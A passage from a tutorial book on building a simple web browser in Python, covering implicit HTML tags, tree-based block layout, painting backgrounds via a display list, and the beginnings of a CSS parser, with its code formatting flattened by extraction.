the tag name (or None
for text nodes), which we’ll compare
to the list of unfinished tags to determine what’s been omitted:
class HTMLParser:
def implicit_tags(self, tag):
while True:
= [node.tag for node in self.unfinished]
open_tags # ...
implicit_tags
has a loop because more than one tag could
have been omitted in a row; every iteration around the loop will add
just one. To determine which implicit tag to add, if any, requires
examining the open tags and the tag being inserted.
Let’s start with the easiest case, the implicit
<html>
tag. An implicit <html>
tag
is necessary if the first tag in the document is something other than
<html>
:
while True:
# ...
if open_tags == [] and tag != "html":
self.add_tag("html")
Both <head>
and <body>
can also
be omitted, but to figure out which it is we need to look at which tag
is being added:
while True:
# ...
elif open_tags == ["html"] \
and tag not in ["head", "body", "/html"]:
if tag in self.HEAD_TAGS:
self.add_tag("head")
else:
self.add_tag("body")
Here, HEAD_TAGS
lists the tags that you’re supposed to
put into the <head>
element:The
<script>
tag can go in either the head or the body
section, but it goes into the head by default.
class HTMLParser:
= [
HEAD_TAGS "base", "basefont", "bgsound", "noscript",
"link", "meta", "title", "style", "script",
]
Note that if both the <html>
and
<head>
tags are omitted, implicit_tags
is going to insert both of them by going around the loop twice. In the
first iteration open_tags
is []
, so the code
adds an <html>
tag; then, in the second iteration,
open_tags
is ["html"]
so it adds a
<head>
tag.These add_tag
methods themselves call
implicit_tags
, which means you can get into an infinite
loop if you forget a case. Remember that every time you add a tag in
implicit_tags
, that tag itself shouldn’t trigger more
implicit tags.
Finally, the </head>
tag can also be implicit, if
the parser is inside the <head>
and sees an element
that’s supposed to go in the <body>
:
while True:
# ...
elif open_tags == ["html", "head"] and \
not in ["/head"] + self.HEAD_TAGS:
tag self.add_tag("/head")
Technically, the </body>
and
</html>
tags can also be implicit. But since our
finish
function already closes any unfinished tags, that
doesn’t need any extra code. So all that’s left for
implicit_tags
tags is to exit out of the loop:
while True:
# ...
else:
break
Of course, there are more rules for handling malformed HTML: formatting tags, nested paragraphs, embedded SVG and MathML, and all sorts of other complexity. Each has complicated rules abounding with edge cases. But let’s end our discussion of handling author errors here.
The rules for malformed HTML may seem arbitrary, and they are: they evolved over years of trying to guess what people “meant” when they wrote that HTML, and are now codified in the HTML parsing standard. Of course, sometimes these rules “guess” wrong—but as so often happens on the web, it’s often more important that every browser does the same thing, rather than each trying to guess what the right thing is.
Thanks to implicit tags, you can mostly skip the
<html>
, <body>
, and
<head>
elements, and they’ll be implicitly added back
for you. Nor does writing them explicitly let you do anything weird; the
HTML parser’s many
states guarantee that there’s only one <head>
and
one <body>
.At least, per document. An HTML file that uses frames or
templates can have more than one <head>
and
<body>
, but they correspond to different
documents.
This chapter taught our browser that HTML is a tree, not just a flat list of tokens. We added:
The tree structure of HTML is essential to display visually complex web pages, as we will see in the next chapter.
The complete set of functions, classes, and methods in our browser should look something like this:
class URL:
def __init__(url)
def request()
WIDTH
HEIGHT
HSTEP
VSTEP
SCROLL_STEP
FONTS
def get_font(size, weight, slant)
class Layout:
def __init__(tree)
def token(tok)
def word(word)
def flush()
def recurse(tree)
def open_tag(tag)
def close_tag(tag)
class Browser:
def __init__()
def load(url)
def draw()
def scrolldown(e)
class Text:
def __init__(text, parent)
def __repr__()
class Element:
def __init__(tag, attributes, parent)
def __repr__()
def print_tree(node, indent)
class HTMLParser:
def __init__(body)
def parse()
def get_attributes(text)
def add_text(text)
SELF_CLOSING_TAGS
def add_tag(tag)
HEAD_TAGS
def implicit_tags(tag)
def finish()
if __name__ == "__main__"
Comments: Update the HTML lexer to support comments.
Comments in HTML begin with <!--
and end with
-->
. However, comments aren’t the same as tags: they can
contain any text, including left and right angle brackets. The lexer
should skip comments, not generating any token at all. Check: is
<!-->
a comment, or does it just start one?
Paragraphs: It’s not clear what it would mean for one
paragraph to contain another. Change the parser so that a document like
<p>hello<p>world</p>
results in two
sibling paragraphs instead of one paragraph inside another; real
browsers do this too.
Scripts: JavaScript code embedded in a
<script>
tag uses the left angle bracket to mean
less-than. Modify your lexer so that the contents of
<script>
tags are treated specially: no tags are
allowed inside <script>
, except the
</script>
close tag.Technically it’s just
</script
followed by a space,
tab, \v
, \r
, slash, or greater than sign.
If you need to talk about </script>
tags inside
JavaScript code, you have to split it into multiple
strings.
Quoted attributes: Quoted attributes can contain spaces and
right angle brackets. Fix the lexer so that this is supported properly.
Hint: the current lexer is a finite state machine, with two states
(determined by in_tag
). You’ll need more states.
Syntax Highlighting: Implement the view-source:
protocol as in Chapter 1, but make it
syntax-highlight the source code of HTML pages. Keep source code for
HTML tags in a normal font, but make text contents bold. If you’ve
implemented it, wrap text in <pre>
tags as well to
preserve line breaks. Hint: subclass the HTML parser and use it to
implement your syntax highlighter.
So far, layout has been a linear process that handles open tags and close tags independently. But web pages are trees, and look like them: borders and backgrounds visually nest inside one another. To support that, this chapter switches to tree-based layout, where the tree of elements is transformed into a tree of layout objects for the visual elements of the page. In the process, we’ll make our web pages more colorful with backgrounds.
Right now, our browser lays out an element’s open and close tags
separately. Both tags modify global state, like the
cursor_x
and cursor_y
variables, but they
aren’t otherwise connected, and information about the element as a
whole, like its width and height, is never computed. That makes it
pretty hard to draw a background color behind text. So web browsers
structure layout differently.
In a browser, layout is about producing a layout tree, whose
nodes are layout objects, each associated with an HTML
element,Elements like
<script>
don’t generate layout objects, and some
elements generate multiple (<li>
elements have a
layout object for the bullet point!), but mostly it’s one layout object
each. and each with a size and a position. The browser
walks the HTML tree to produce the layout tree, then computes the size
and position for each layout object, and finally draws each layout
object to the screen.
Let’s start by looking how the existing Layout
class is
used:
class Browser:
def load(self, url):
# ...
self.display_list = Layout(self.nodes).display_list
#...
Here, a Layout
object is created briefly and then thrown
away. Let’s instead make it the beginning of our layout tree by storing
it in a Browser
field:
class Browser:
def load(self, url):
# ...
self.document = Layout(self.nodes)
self.document.layout()
self.display_list = self.document.display_list
#...
Note that I’ve renamed the Layout
constructor to a
layout
method, so that constructing a layout object and
actually laying it out can be different steps. The constructor now just
stores the node it was passed:
class Layout:
def __init__(self, node):
self.node = node
So far, we still don’t have a tree—we just have a single
Layout
object. To make it into a tree, we’ll need add child
and parent pointers. I’m also going to add a pointer to the previous
sibling, because that’ll be useful for computing sizes and positions
later:
class Layout:
def __init__(self, node, parent, previous):
self.node = node
self.parent = parent
self.previous = previous
self.children = []
That said, requiring a parent
and previous
element now makes it tricky to construct a Layout
object in
Browser
, since the root of the layout tree obviously can’t
have a parent. To rectify that, let me add a second kind of layout
object to serve as the root of the layout tree.I don’t want to just pass
None
for the parent, because the root layout object also
computes its size and position differently, as we’ll see later this
chapter. I think of that root as the document itself, so
let’s call it DocumentLayout
:
class DocumentLayout:
def __init__(self, node):
self.node = node
self.parent = None
self.children = []
def layout(self):
= Layout(self.node, self, None)
child self.children.append(child)
child.layout()self.display_list = child.display_list
Note an interesting thing about this new layout
method:
its role is to create the child layout objects, and then
recursively call its children’s layout
methods.
This is a common pattern for constructing trees, and we’ll be seeing it
a lot throughout this book.
Now when we construct a DocumentLayout
object inside
load
, we’ll be building a tree! A very short tree, more of
a stump for now, but it’s something!
By the way, since we now have DocumentLayout
, let’s
rename Layout
so it’s less ambiguous. I like
BlockLayout
as a name, because we ultimately want
Layout
to represent a block of text, like a paragraph or a
heading:
class BlockLayout:
# ...
Make sure to rename the Layout
constructor call in
DocumentLayout
as well. Test your browser and make sure
that after all of these refactors, everything still works.
The layout tree isn’t accessible to web developers, so it hasn’t been standardized, and its structure differs between browsers. Even the names don’t match! Chrome calls it a layout tree, Safari a render tree, and Firefox a frame tree.
So far, we’ve focused on text layout—and text is laid out horizontally in lines.In European languages, at least! But web pages are really constructed out of larger blocks, like headings, paragraphs, and menus, that are stacked vertically one after another. We need to add support for this kind of layout to our browser, and the way we’re going to do that involves expanding on the layout tree we’ve already built.
The core idea is that we’ll have a whole tree of
BlockLayout
objects (with a DocumentLayout
at
the root). Some will represent leaf blocks that contain text, and
they’ll lay out their contents the way we’ve already implemented. But
there will also be new, intermediate BlockLayout
s with
BlockLayout
children, and they will stack their children
vertically.
To create these intermediate BlockLayout
children, we
can use a loop like this:
class BlockLayout:
def layout_intermediate(self):
= None
previous for child in self.node.children:
next = BlockLayout(child, self, previous)
self.children.append(next)
= next previous
I’ve called this method layout_intermediate
, but only so
you can add it to the code right away and then compare it with the
existing recurse
method.
This code is tricky, so read it carefully. It involves two trees: the
HTML tree, which node
and child
point to; and
the layout tree, which self
, previous
, and
next
point to. The two trees have similar structure, so
it’s easy to get confused. But remember that this code constructs the
layout tree from the HTML tree, so it reads from
node.children
(in the HTML tree) and writes to
self.children
(in the layout tree).
So we have two ways to lay out an element: either calling
recurse
and flush
, or this
layout_intermediate
function. To determine which one a
layout object should use, we’ll need to know what kind of content its
HTML node contains: text and text-related tags like
<b>
, or blocks like <p>
and
<h1>
. That function looks something like this:
class BlockLayout:
def layout_mode(self):
if isinstance(self.node, Text):
return "inline"
elif self.node.children:
if any([isinstance(child, Element) and \
in BLOCK_ELEMENTS
child.tag for child in self.node.children]):
return "block"
else:
return "inline"
else:
return "block"
Here the list of BLOCK_ELEMENTS
is basically what you
expect, a list of all the tags that describe parts of a page instead of
formatting:Taken from
the HTML
living standard.
= [
BLOCK_ELEMENTS "html", "body", "article", "section", "nav", "aside",
"h1", "h2", "h3", "h4", "h5", "h6", "hgroup", "header",
"footer", "address", "p", "hr", "pre", "blockquote",
"ol", "ul", "menu", "li", "dl", "dt", "dd", "figure",
"figcaption", "main", "div", "table", "form", "fieldset",
"legend", "details", "summary"
]
Our layout_mode
method has to handle one tricky case,
where a node contains both block children like a <p>
element but also text children like a text node or a
<b>
element. I’ve chosen to use block mode in this
case, but it’s probably best to think of this as a kind of error on the
part of the web developer. And just like with implicit tags in Chapter 4, we use a repair mechanism to make sense
of the situation.In real
browsers, that repair mechanism is called “anonymous
block boxes” and is more complex than what’s described
here.
So now BlockLayout
can determine what kind of layout to
do based on the layout_mode
of its HTML node:
class BlockLayout:
def layout(self):
= self.layout_mode()
mode if mode == "block":
= None
previous for child in self.node.children:
next = BlockLayout(child, self, previous)
self.children.append(next)
= next
previous else:
self.cursor_x = 0
self.cursor_y = 0
self.weight = "normal"
self.style = "roman"
self.size = 16
self.line = []
self.recurse(self.node)
self.flush()
Finally, since BlockLayout
s can now have children, the
layout
method next needs to recursively call
layout
so those children can construct their children, and
so on recursively:
class BlockLayout:
def layout(self):
# ...
for child in self.children:
child.layout()
We also need to gather their display_list
fields into a
single array:
class BlockLayout:
def layout(self):
# ...
for child in self.children:
self.display_list.extend(child.display_list)
Our browser is now constructing a whole tree of
BlockLayout
objects; in fact, if you add a
print_tree
call to Browser
’s load
method, you’ll see that large web pages like this chapter produce large
and complex layout trees!
Oh, you might also notice that the text on these web pages is now totally unreadable, because it’s all overlapping at the top of the page. Let’s fix that next.
In CSS, the layout mode is set by the display
property. The oldest CSS layout modes, like inline
and
block
, are set on the children instead of the parent, which
leads to hiccups like anonymous
block boxes. Newer properties like inline-block
,
flex
, and grid
are set on the parent. This
chapter uses the newer, less confusing convention, even though it’s
actually implementing inline and block layout.
In the previous chapter, the
Layout
object was responsible for the whole web page, so it
just laid out its content starting at the top of the page. Now that we
have multiple BlockLayout
objects each containing a
different paragraph of text, we’re going to need to do things a little
differently, computing a size and position for each layout object
independently.
Let’s start with cursor_x
and cursor_y
.
Instead of having them denote absolute positions on the page, let’s make
them relative to the BlockLayout
itself; they now need to
start from 0
instead of HSTEP
and
VSTEP
, both in layout
and
flush
:
class BlockLayout:
def layout(self):
else:
self.cursor_x = 0
self.cursor_y = 0
def flush(self):
# ...
self.cursor_x = 0
# ...
Since these fields are now relative, we’ll need to add the block’s
x
and y
position in flush
when
computing the display list:
class BlockLayout:
def flush(self):
# ...
for rel_x, word, font in self.line:
= self.x + rel_x
x = self.y + baseline - font.metrics("ascent")
y self.display_list.append((x, y, word, font))
# ...
Similarly, to wrap lines, we can’t compare cursor_x
to
WIDTH
, because cursor_x
is a relative measure
while WIDTH
is an absolute measure; instead, we’ll wrap
lines when cursor_x
reaches the block’s
width
:
class BlockLayout:
def word(self, word):
# ...
if self.cursor_x + w > self.width:
# ...
# ...
So now that leaves us with the problem of computing these
x
, y
, and width
fields. Let’s
recall that BlockLayout
s represent blocks of text like
paragraphs or headings, and are stacked vertically one atop another.
That means each one starts at its parent’s left edge:
class BlockLayout:
def layout(self):
self.x = self.parent.x
# ...
Its vertical position depends on the position and height of their previous sibling. If there is no previous sibling, they start at the parent’s top edge:
class BlockLayout:
def layout(self):
if self.previous:
self.y = self.previous.y + self.previous.height
else:
self.y = self.parent.y
# ...
Note that in each of these cases, to compute one block’s
x
and y
, the x
and y
of its parent block must already have been computed. That means
these computations have to go before the recursive
layout
call, so those children can compute their
x
and y
based on this block’s x
and y
. Similarly, since the y
position of a
block depends on its previous sibling’s y
position, the
recursive layout
calls have to start at the first sibling
and iterate through the list forward—which is how we’ve already done it,
but which will be an important constraint in later chapters.
Now we’ll need compute widths and heights. Width is easy: blocks are as wide as their parents:In the next chapter, we’ll add support for author-defined styles, which in real browsers modify these layout rules by setting custom widths or changing how x and y position are computed.
class BlockLayout:
def layout(self):
self.width = self.parent.width
# ...
Height, meanwhile, is a little tricky. A BlockLayout
that contains other blocks should be tall enough to contain all of its
children, so its height should be the sum of its children’s heights:
class BlockLayout:
def layout(self):
# ...
if mode == "block":
self.height = sum([
for child in self.children]) child.height
However, a BlockLayout
that contains text doesn’t have
children; instead, it needs to be tall enough to contain all its text,
which we can conveniently read off of cursor_y
:Since the height is just equal
to cursor_y
, why not rename cursor_y
to
height
instead? You could, it would work fine, but I would
rather not. As you can see from, say, the y
computation,
the height
field is a public field, read by other layout
objects to compute their positions. As such I’d rather make sure it
always has the right value, whereas cursor_y
changes as we lay out a paragraph of text and therefore sometimes has
the “wrong” value. Keeping these two fields separate avoids a whole
class of nasty bugs where the height
field is read “too
soon” and therefore gets the wrong value.
class BlockLayout:
def layout(self):
# ...
else:
self.height = self.cursor_y
Let’s think again about dependencies. Height has the opposite
dependencies compared to x
, y
, and
width
: the height
of a block depends on its
children’s heights. While x
, y
, and
width
must be computed before the recursive call,
height
has to be computed after, at the very end
of layout
.
Finally, even DocumentLayout
needs some layout code,
though since the document always starts in the same place it’s pretty
simple:
class DocumentLayout:
def layout(self):
# ...
self.width = WIDTH - 2*HSTEP
self.x = HSTEP
self.y = VSTEP
child.layout()self.height = child.height + 2*VSTEP
Note that there’s some padding around the contents—HSTEP
on the left and right, and VSTEP
above and below. That’s so
the text won’t run into the very edge of the window and get cut off.
For all three types of layout object, the order of the steps in the
layout
method should be the same:
layout
is called, it first computes the
width
, x
, and y
fields, reading
from the parent
and previous
layout
objects.layout
methods.layout
computes the height
field,
reading from the child layout objects.You can see these steps in action in this widget:
This kind of dependency reasoning is crucial to layout and more broadly to any kind of computation on trees. If you get the order of operations wrong, some layout object will try to read a value that hasn’t been computed yet, and the browser will have a bug. We’ll come back to this issue of dependencies later, where it will become even more important.
Anyway, with all of the sizes and positions now computed correctly, you should see the browser now correctly display all of the text on the page.
Formally, computations on a tree like this can be described by an attribute grammar. Attribute grammar engines analyze dependencies between different attributes to determine the right order to traverse the tree and calculate each attribute.
Our layout
method is now doing quite a bit of work:
computing sizes and positions; creating child layout objects;
recursively laying out those child layout objects; and aggregating the
display lists so the text can be drawn to the screen. This is a bit
messy, so let’s take a moment to extract just one part of this, the
display list part. Along the way, we can stop copying the display list
contents over and over again as we go up the layout tree.
I think it’s most convenient to do that by adding a
paint
function to each layout object, which appends any of
its own layout objects to the display list and then recursively paints
the child layouts. A neat trick here is to pass the list itself as an
argument, and have the recursive function append to that list. For
DocumentLayout
, which only has one child, the recursion
looks like this:
class DocumentLayout:
def paint(self, display_list):
self.children[0].paint(display_list)
You can now delete the line that computes a
DocumentLayout
’s display_list
field.
For a BlockLayout
with multiple children,
paint
is called on each child:
class BlockLayout:
def paint(self, display_list):
for child in self.children:
child.paint(display_list)
Again, delete the line that computes a BlockLayout
’s
display_list
field by copying from child layout
objects.
Finally for a BlockLayout
object with text inside, we
need to copy over the display_list
field that it computes
during recurse
and flush
:
class BlockLayout:
def paint(self, display_list):
self.display_list) display_list.extend(
Now the browser can use paint
to collect its own
display_list
variable:
class Browser:
def load(self, url):
# ...
self.display_list = []
self.document.paint(self.display_list)
self.draw()
Check it out: your browser is now using fancy tree-based layout! I recommend pausing to test and debug. Tree-based layout is powerful but complex, and we’re about to add more features. Stable foundations make for comfortable houses.
Layout trees are common in GUI frameworks, but there are other ways to structure layout, such as constraint-based layout. TeX’s boxes and glue and iOS auto-layout are two examples of this alternative paradigm.
Browsers use the layout tree a lot,For example, in Chapter 7, we’ll use the size and position of each link to figure out which one the user clicked on. and one simple and visually compelling use case is drawing backgrounds.
Backgrounds are rectangles, so our first task is putting rectangles in the display list. Conceptually, the display list contains commands, and we want two types of commands:
class DrawText:
def __init__(self, x1, y1, text, font):
self.top = y1
self.left = x1
self.text = text
self.font = font
class DrawRect:
def __init__(self, x1, y1, x2, y2, color):
self.top = y1
self.left = x1
self.bottom = y2
self.right = x2
self.color = color
Now BlockLayout
must add DrawText
objects
to the display list:Why
not change the display_list
field inside an
BlockLayout
to contain DrawText
commands
directly? I suppose you could, but I think it’s cleaner this way, with
all of the draw commands created in one place.
class BlockLayout:
def paint(self, display_list):
for x, y, word, font in self.display_list:
display_list.append(DrawText(x, y, word, font))# ...
Note that we must add the block’s x
and y
,
since the positions in the display list are relative to the block’s
position.
But it can also add DrawRect
commands for backgrounds.
Let’s add a gray background to pre
tags (which are used for
code examples):
class BlockLayout:
def paint(self, display_list):
if isinstance(self.node, Element) and self.node.tag == "pre":
= self.x + self.width, self.y + self.height
x2, y2 = DrawRect(self.x, self.y, x2, y2, "gray")
rect
display_list.append(rect)# ...
Make sure this code comes before the loop that adds
DrawText
objects and before the recursion into
child layout objects: the background has to be drawn below and
therefore before any contents. This is again a kind of
dependency reasoning with tree traversals!
With the display list filled out, we need the paint
method to run each graphics command. Let’s add an execute
method for this. On DrawText
it calls
create_text
:
class DrawText:
def execute(self, scroll, canvas):
canvas.create_text(self.left, self.top - scroll,
=self.text,
text=self.font,
font='nw',
anchor )
Note that execute
takes the scroll amount as a
parameter; this way, each graphics command does the relevant coordinate
conversion itself. DrawRect
does the same with
create_rectangle
:
class DrawRect:
def execute(self, scroll, canvas):
canvas.create_rectangle(self.left, self.top - scroll,
self.right, self.bottom - scroll,
=0,
width=self.color,
fill )
By default, create_rectangle
draws a one-pixel black
border, which for backgrounds we don’t want, so make sure to pass
width = 0
:
We still want to skip offscreen graphics commands, so let’s add a
bottom
field to DrawText
so we know when to
skip those:
def __init__(self, x1, y1, text, font):
# ...
self.bottom = y1 + font.metrics("linespace")
The browser’s draw
method now just uses top
and bottom
to decide which commands to
execute
:
class Browser:
def draw(self):
self.canvas.delete("all")
for cmd in self.display_list:
if cmd.top > self.scroll + HEIGHT: continue
if cmd.bottom < self.scroll: continue
self.scroll, self.canvas) cmd.execute(
Try your browser on a page—maybe this one—with code snippets on it. You should see each code snippet set off with a gray background.
On some systems, the measure
and metrics
commands are awfully slow. Adding another call makes things even
slower.
Luckily, this metrics
call duplicates a call in
flush
. If you’re careful you can pass the results of that
call to DrawText
as an argument.
Here’s one more cute benefit of tree-based layout. Thanks to tree-based layout we now record the height of the whole page. The browser can use that to avoid scrolling past the bottom of the page:
def scrolldown(self, e):
= max(self.document.height - HEIGHT, 0)
max_y self.scroll = min(self.scroll + SCROLL_STEP, max_y)
self.draw()
So those are the basics of tree-based layout! In fact, as we’ll see in the next two chapters, this is just part of the layout tree’s role in the browser. But before we get to that, we need to add some styling capabilities to our browser.
The draft CSS Painting API allows pages to extend the display list with new types of commands, implemented in JavaScript. This makes it possible to use CSS for styling with visually-complex styling provided by a library.
This chapter was a dramatic rewrite of your browser’s layout engine:
Tree-based layout makes it possible to dramatically expand our browser’s styling capabilities. We’ll work on that in the next chapter.
The complete set of functions, classes, and methods in our browser should look something like this:
class URL:
def __init__(url)
def request()
WIDTH
HEIGHT
HSTEP
VSTEP
SCROLL_STEP
FONTS
def get_font(size, weight, slant)
class Text:
def __init__(text, parent)
def __repr__()
class Element:
def __init__(tag, attributes, parent)
def __repr__()
def print_tree(node, indent)
class HTMLParser:
def __init__(body)
def parse()
def get_attributes(text)
def add_text(text)
SELF_CLOSING_TAGS
def add_tag(tag)
HEAD_TAGS
def implicit_tags(tag)
def finish()
class BlockLayout:
def __init__(node, parent, previous)
def token(tok)
def word(word)
def flush()
def recurse(tree)
def open_tag(tag)
def close_tag(tag)
def layout()
def layout_mode()
def paint(display_list)
class Browser:
def __init__()
def load(url)
def draw()
def scrolldown(e)
BLOCK_ELEMENTS
class DocumentLayout:
def __init__(node)
def layout()
def paint(display_list)
def __repr__()
class DrawText:
def __init__(x1, y1, text, font)
def execute(scroll, canvas)
def __repr__()
class DrawRect:
def __init__(x1, y1, x2, y2, color)
def execute(scroll, canvas)
def __repr__()
if __name__ == "__main__"
Links Bar: At the top and bottom of each chapter of this
book is a gray bar naming the chapter and offering back and forward
links. It is enclosed in a <nav class="links">
tag.
Have your browser give this links bar the light gray background a real
browser would.
Hidden Head: There’s a good chance your browser is still
showing scripts, styles, and page titles at the top of every page you
visit. Make it so that the <head>
element and its
contents are never displayed. Those elements should still be in the HTML
tree, but not in the layout tree.
Bullets: Add bullets to list items, which in HTML are
<li>
tags. You can make them little squares, located
to the left of the list item itself. Also indent <li>
elements so the text inside the element is to the right of the bullet
point.
Scrollbar: At the right edge of the screen, draw a blue, rectangular scrollbar. The ratio of its height to the screen height should be the same as the ratio of the screen height to the document height, and its location should reflect the position of the screen within the document. Hide the scrollbar if the whole document fits onscreen.
Table of Contents: This book has a table of contents at the
top of each chapter, enclosed in a <nav id="toc">
tag, which contains a list of links. Add the text “Table of Contents”,
with a gray background, above that list. Don’t modify the lexer or
parser.
Anonymous block boxes: Sometimes, an element has a mix of text-like and container-like children. For example, in this HTML,
<div><i>Hello, </i><b>world!</b><p>So it began...</p></div>
the <div>
element has three children: the
<i>
, <b>
, and
<p>
elements. The first two are text-like; the last
is container-like. This is supposed to look like two paragraphs, one for
the <i>
and <b>
and the second for
the <p>
. Make your browser do that. Specifically,
modify BlockLayout
so it can be passed a sequence of
sibling nodes, instead of a single node. Then, modify the algorithm that
constructs the layout tree so that any sequence of text-like elements
gets made into a single BlockLayout
.
Run-ins: A “run-in heading” is a heading that is drawn as
part of the next paragraph’s text.The exercise names in this section could be considered
run-in headings. But since browser support for the
display: run-in
property is poor, this book actually
doesn’t use it; the headings are actually embedded in the next
paragraph. Modify your browser to render
<h6>
elements as run-in headings. You’ll need to
implement the previous exercise on anonymous block boxes, and then add a
special case for <h6>
elements.
In the last chapter, we gave each
pre
element a gray background. It looks OK, and it
is good to have defaults… but of course sites want a say in how
they look. Websites do that with Cascading Style Sheets, which
allow web authors (and, as we’ll see, browser developers) to define how
a web page ought to look.
One way a web page can change its appearance is with the
style
attribute. For example, this changes an element’s
background color:
<div style="background-color:lightblue"></div>
More generally, a style
attribute contains
property/value pairs separated by semicolons. The browser looks at those
property-value pairs to determine how an element looks, for example to
determine its background color.
To add this to our browser, we’ll need to start by parsing these
property/value pairs. I’ll use recursive parsing functions,
which are a good way to build a complex parser step by step. The idea is
that each parsing function advances through the text being parsed and
returns the data it parsed. We’ll have different functions for different
types of data, and organize them in a CSSParser
class that
stores the text being parsed and the parser’s current position in
it:
class CSSParser:
def __init__(self, s):
self.s = s
self.i = 0
Let’s start small and build up. A parsing function for whitespace
increments the index i
past every whitespace character:
def whitespace(self):
while self.i < len(self.s) and self.s[self.i].isspace():
self.i += 1
Whitespace is insignificant, so there’s no data to return in this case. On the other hand, we’ll want to return property names and values when we parse them:
def word(self):
= self.i
start while self.i < len(self.s):
if self.s[self.i].isalnum() or self.s[self.i] in "#-.%":
self.i += 1
else:
break
if not (self.i > start):
raise Exception("Parsing error")
return self.s[start:self.i]
This function increments i
through any word
characters,I’ve chosen
the set of word characters here to cover property names (which use
letters and the dash), numbers (which use the minus sign, numbers,
periods), units (the percent sign), and colors (which use the hash
sign). Real CSS values have a more complex syntax but this is enough for
our toy browser. much like whitespace
. But to
return the parsed data, it stores where it started and extracts the
substring it moved through.
Parsing functions can fail. The word
function we just
wrote raises an exception if i
hasn’t advanced though at
least one character—otherwise it didn’t point at a word to begin
with.You can add error
text to the exception-raising code, too; I recommend doing that to help
you debug problems. Likewise, to check for a literal colon
(or some other punctuation character) you’d do this:
def literal(self, literal):
if not (self.i < len(self.s) and self.s[self.i] == literal):
raise Exception("Parsing error")
self.i += 1
The great thing about parsing functions is that they can build on one
another. For example, property-value pairs are a property, a colon, and
a value,In reality
properties and values have different syntaxes, so using
word
for both isn’t quite right, but for our browser’s
limited CSS this simplification will do. with whitespace
in between:
def pair(self):
= self.word()
prop self.whitespace()
self.literal(":")
self.whitespace()
= self.word()
val return prop.lower(), val
We can parse sequences by calling parsing functions in a loop. For
example, style
attributes are a sequence of property-value
pairs:
def body(self):
= {}
pairs while self.i < len(self.s):
= self.pair()
prop, val = val
pairs[prop.lower()] self.whitespace()
self.literal(";")
self.whitespace()
return pairs
Now, in a browser, we always have to think about handling errors. Sometimes a web page author makes a mistake; sometimes our browser doesn’t support a feature some other browser does. So we should skip property-value pairs that don’t parse, but keep the ones that do.
We can skip things with this little function; it stops at any one of
a set of characters, and returns that character (or None
if
it was stopped by the end of the file):
def ignore_until(self, chars):
while self.i < len(self.s):
if self.s[self.i] in chars:
return self.s[self.i]
else:
self.i += 1
When we fail to parse a property-value pair, we either skip to the next semicolon or to the end of the string:
def body(self):
# ...
while self.i < len(self.s):
try:
# ...
except Exception:
= self.ignore_until([";"])
why if why == ";":
self.literal(";")
self.whitespace()
else:
break
# ...
Skipping parse errors is a double-edged sword. It hides error
messages, making it harder for authors to debug their style sheets; it
also makes it harder to debug your parser.I suggest removing the
try
block when debugging. So in most
programming situations this “catch-all” error handling is a code
smell.
But “catch-all” error handling has an unusual benefit on the web. The
web is an ecosystem of many browsers,And an ecosystem of many browser versions, some of which
haven’t been written yet—but need to be supported as best we
can. which (for example) support different kinds of
property values.Our
browser does not support parentheses in property values, for example,
which real browsers use for things like the calc
and
url
functions. CSS that parses in one browser
might not parse in another. With silent parse errors, browsers just
ignore stuff they don’t understand, and web pages mostly work in all of
them. The principle (variously called “Postel’s Law”,After a line in the
specification of TCP, written by Jon Postel the “Digital
Principle”,After a
similar idea in circuit design, where transistors must be nonlinear to
reduce analog noise. or the “Robustness Principle”) is:
produce maximally conformant output but accept even minimally conformant
input.
This parsing method is formally called recursive descent parsing for an LL(1) language. Parsers that use this method can be really, really fast, at least if you put a lot of work into it. In a browser, faster parsing means pages load faster.
style
attributeNow that the style
attribute is parsed, we can use that
parsed information in the rest of the browser. We’ll store the parsed
information in a style
field on each node:
def style(node):
= {}
node.style # ...
for child in node.children:
style(child)
Call style
in the browser’s load
method,
after parsing the HTML but before doing layout.
This style
function will also fill in the
style
field by parsing the element’s style
attribute:
def style(node):
# ...
if isinstance(node, Element) and "style" in node.attributes:
= CSSParser(node.attributes["style"]).body()
pairs for property, value in pairs.items():
property] = value
node.style[# ...
With the style
information stored on each element, the
browser can consult it for styling information:
class BlockLayout:
def paint(self, display_list):
= self.node.style.get("background-color",
bgcolor "transparent")
if bgcolor != "transparent":
= self.x + self.width, self.y + self.height
x2, y2 = DrawRect(self.x, self.y, x2, y2, bgcolor)
rect
display_list.append(rect)# ...
I’ve removed the default gray background from pre
elements for now, but we’ll put it back soon.
Open this chapter up in your browser to test your code: the code block right after this paragraph should now have a light blue background.
<div style="background-color:lightblue"> ... </div>
So this is one way web pages can change their appearance. And in the
early days of the web,I’m talking Netscape 3. The late 90s.
something like this was the only way. But honestly, it’s a
pain—you need to set a style
attribute on each element, and
if you change the style that’s a lot of attributes to edit. CSS was
invented to improve on this state of affairs:
To achieve these goals, CSS extends the style
attribute
with two related ideas: selectors and cascading.
Selectors describe which HTML elements a list of property/value pairs
apply to:CSS rules can
also be guarded by “media queries”, which say that a rule should apply
only in certain browsing environments (like only on mobile or only in
landscape mode). Media queries are super-important for building sites
that work across many devices, like reading this book on a
phone.
: value-1; property-2: value-2; } selector { property-1
Since one of these rules can apply to many elements, it’s possible for several rules to apply to the same element. So browsers have a cascading mechanism to resolve conflicts in favor of the most specific rule. Cascading also means a browser can ignore rules it doesn’t understand and choose the next-most-specific rule that it does understand.
So next, let’s add support for CSS to our browser. We’ll need to
parse CSS files into selectors and property/value pairs; figure out
which elements on the page match each selector; and then copy those
property values to the elements’ style
fields.
Actually, before CSS, you’d style pages with custom elements like font
and center
.
This was easy to implement but made it hard to keep pages consistent.
There were also properties on <body>
like text
and vlink
that could consistently set text colors,
mainly for links.
Selectors come in lots of types, but in our browser, we’ll support
two: tag selectors (p
selects all <p>
elements, ul
selects all <ul>
elements)
and descendant selectors (article div
selects all
div
elements with an article
ancestor).The descendant selector
associates to the left; in other words, a b c
means a
c
that descends from a b
that descends from an
a
, which maybe you’d write (a b) c
if CSS had
parentheses.
We’ll have a class for each type of selector to store the selector’s contents, like the tag name for a tag selector:
class TagSelector:
def __init__(self, tag):
self.tag = tag
Each selector class will also test whether the selector matches an element:
def matches(self, node):
return isinstance(node, Element) and self.tag == node.tag
A descendant selector works similarly. It has two parts, which are both themselves selectors:
class DescendantSelector:
def __init__(self, ancestor, descendant):
self.ancestor = ancestor
self.descendant = descendant
Then the match
method is recursive (and bottoms out at,
say, a TagSelector
):
class DescendantSelector:
def matches(self, node):
if not self.descendant.matches(node): return False
while node.parent:
if self.ancestor.matches(node.parent): return True
= node.parent
node return False
Now, to create these selector objects, we need a parser. In this
case, that’s just another parsing function:Once again, using
word
here for tag names is actually not quite right, but
it’s close enough. One tricky side effect of using word
is
that a class name selector (like .main
